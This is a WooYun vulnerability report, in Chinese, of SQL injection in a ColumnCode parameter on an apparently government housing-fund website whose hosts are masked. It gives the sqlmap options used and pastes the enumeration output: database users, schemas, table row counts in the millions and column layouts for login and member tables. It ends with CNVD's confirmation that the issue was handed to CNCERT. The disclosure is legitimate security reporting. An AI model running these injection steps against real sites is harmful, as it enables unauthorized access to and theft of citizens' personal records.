乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-04: 细节已通知厂商并且等待厂商处理中 2016-04-06: 厂商已经确认,细节仅向厂商公开 2016-04-16: 细节向核心白帽子及相关领域专家公开 2016-04-26: 细节向普通白帽子公开 2016-05-06: 细节向实习白帽子公开 2016-05-21: 细节向公众公开
数据啊!~~~
注入点:
http://**.**.**.**/Website/newslist.jsp?ColumnCode=m0403http://**.**.**.**/website/newsshowphoto.jsp?ColumnCode=l07http://**.**.**.**/Website/contentshow.jsp?ColumnCode=m0301http://**.**.**.**/Website/newslistm8001.jsp?ColumnCode=m8001http://**.**.**.**/Website/newslistm0204.jsp?ColumnCode=m0204http://**.**.**.**/Website/filelist.jsp?ColumnCode=02
ColumnCode均存在注入使用神器sqlmap测试,添加参数--threads 10 --dbms "Oracle" --level 3 --risk 3
database management system users [29]:[*] ANONYMOUS[*] BI[*] CTXSYS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] GJJMX12[*] HR[*] HZGJJWZ[*] IX[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OE[*] OLAPSYS[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDBavailable databases [22]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] GJJMX12[*] HR[*] HZGJJWZ[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB我们就拿当前库来看看里面的数据吧!~~~总共429个表Database: GJJMX12+---------------+---------+| Table | Entries |+---------------+---------+| GZRZK | 4972418 || GZZGPZK | 4375675 || GZJCZTK | 1196180 || GZBJK | 1182516 || APP_DBTRACE | 1008941 || GJJ_JHDL | 954132 || GZHKK | 388469 || GZPZK | 281268 || GZJBK | 279636 || GZBGK | 217325 || TX_DKHK_YHMXK | 145991 || GZBGK_BAK | 91660 || GZZGKLK | 69975 || BM_G096 | 63320 || GZJCRSTJK | 53013 || GZSHYJK | 46992 || GZRDK | 43953 || GZZQK | 41364 || GZSHK | 38676 || GZJKK | 34834 || GZDKK | 21610 || BM_E007 | 16390 || GZTQK | 16230 || GZZQSPK | 14198 || BM_ZYDB | 12028 || AA11 | 8253 || AA14 | 8232 || AA13 | 8213 || AA12 | 8195 || AAGZZGPZK | 5476 || AAGZBJK | 5409 || GZHBK | 4326 || BM_A003 | 4174 || GZJZK | 3806 || GZBGK_JBQK | 3692 || GZFXK | 1955 || BM_E009 | 1928 || GZDKK_CL | 1846 || LOG_ERR | 1782 || BM_DYDB | 1695 || DABH | 1648 || GZDWBGK | 1580 || GZGJK | 910 || USER_ROLE | 888 || BM_DKDA | 324 || MODULE_FUNC | 324 || LYBJK | 318 || APP_REPORT_DK | 296 || GZHKZHBGK | 291 || AAGZPZK | 258 || APP_USER | 257 || GZDKLLK | 240 || GZSQDAK | 240 || APP_REPORT | 238 || BM_LDDB | 233 || GZDKZXK | 231 || MENU_ITEM | 173 || BM_DKTJ | 168 || GZSHBGK | 81 || "PARAMETER" | 80 || GZTZK | 77 || BM_P015 | 72 || JCK | 71 || AAGZJKK | 67 || AA10 | 65 || GZDKBGK | 63 || AAGZRDK | 62 || BM_KMDY | 55 || GZDWJCBGSPK | 54 || AAGZZYK | 52 || BM_YWMK | 50 || BM_XTCS | 49 || BM_STYH | 48 || GZSHK_LY | 39 || BM_ZXZBBZ | 37 || BM_P012 | 36 || BM_ZGBM | 36 || GZDWJCBGK | 32 || GZZCKZQK | 29 || GZBGK_DWQC | 26 || BM_TQCL | 23 || GZZYK | 20 || GZLLK | 18 || APP_ROLE | 17 || BM_A093 | 17 || BM_D006 | 15 || BM_ZGZW | 15 || BM_A097 | 14 || BM_A075 | 13 || GZLSK | 13 || BM_A073 | 12 || BM_SSQX | 12 || BM_SPWJ | 11 || BM_ZGXL | 11 || BM_ZXZB | 11 || BM_A071 | 10 || BM_DBFS | 10 || BM_XTZB | 9 || BM_B012 | 8 || BM_HKFS | 8 || BM_HZDW | 8 || BM_TXJY | 8 || BM_ZGZC | 8 || BM_DKZGTJ | 7 || BM_G071 | 7 || BM_ZZXM | 7 || BM_ZXJG | 6 || GZRDK_BAK | 6 || NEWS_FJK | 6 || BM_C006 | 5 || BM_DKLX | 5 || BM_FWTX | 5 || BM_G067 | 5 || BM_KHCL | 5 || BM_TQFW | 5 || BM_XHCL | 5 || BM_XHZM | 5 || BM_ZCXM | 5 || BM_ZGHY | 5 || GZSHDQBGK | 5 || BM_B031 | 4 || BM_FZXM | 4 || BM_SRXM | 4 || BM_ZXDJ | 4 || BM_ZYZG | 4 || NZPZ | 4 || BM_A015 | 3 || BM_A095 | 3 || BM_DKSPJB | 3 || BM_DKSPSC | 3 || BM_LSDA | 3 || BM_SSGX | 3 || BM_XGCL | 3 || BM_XHYY | 3 || BM_ZJLX | 3 || GZJKK_DWDJ | 3 || GZSHDQBGSPK | 3 || NZCW | 3 || TMP_TABLE | 3 || BM_A005 | 2 || BM_BGCL | 2 || BM_CXLX | 2 || BM_DYLX | 2 || BM_GJSPJB | 2 || BM_TQSPSC | 2 || BM_ZGZY | 2 || GZPZK_BAK | 2 || LYRDK | 2 || ZCKBAK | 2 || BM_A174 | 1 || BM_E013 | 1 || BM_FKYH | 1 || BM_G094 | 1 || BM_G095 | 1 || BM_G139 | 1 || GZJKK_BAK | 1 || GZNDK | 1 || GZSHK_ZP | 1 |+---------------+---------+Database: GJJMX12Table: GZRZK[13 columns]+-----------+----------+| Column | Type |+-----------+----------+| BEGINTIME | DATE || ENDTIME | DATE || GJDBM | VARCHAR2 || LOGINIP | VARCHAR2 || LOGINMC | VARCHAR2 || LSGXBM | VARCHAR2 || TOPIC | VARCHAR2 || TPCODE | VARCHAR2 || USERID | VARCHAR2 || USERNAME | VARCHAR2 || YWCZBS | NUMBER || YWCZLB | VARCHAR2 || YWMKBM | VARCHAR2 |+-----------+----------+Database: GJJMX12Table: GZZGPZK[21 columns]+--------+----------+| Column | Type |+--------+----------+| A001 | VARCHAR2 || A002 | VARCHAR2 || A003 | VARCHAR2 || A071 | VARCHAR2 || A073 | VARCHAR2 || A075 | VARCHAR2 || P002 | DATE || P005 | VARCHAR2 || P006 | DATE || P007 | VARCHAR2 || P008 | NUMBER || P009 | NUMBER || P012 | VARCHAR2 || P015 | VARCHAR2 || P018 | VARCHAR2 || P021 | VARCHAR2 || P023 | VARCHAR2 || P026 | DATE || P029 | VARCHAR2 || P030 | VARCHAR2 || PZID | VARCHAR2 |+--------+----------+
几千万的数据,只因太慢了,就不继续了!~~~
大量的用户,涉及几千万的信息了!~~~
过滤修复
危害等级:高
漏洞Rank:10
确认时间:2016-04-06 14:14
CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置.
暂无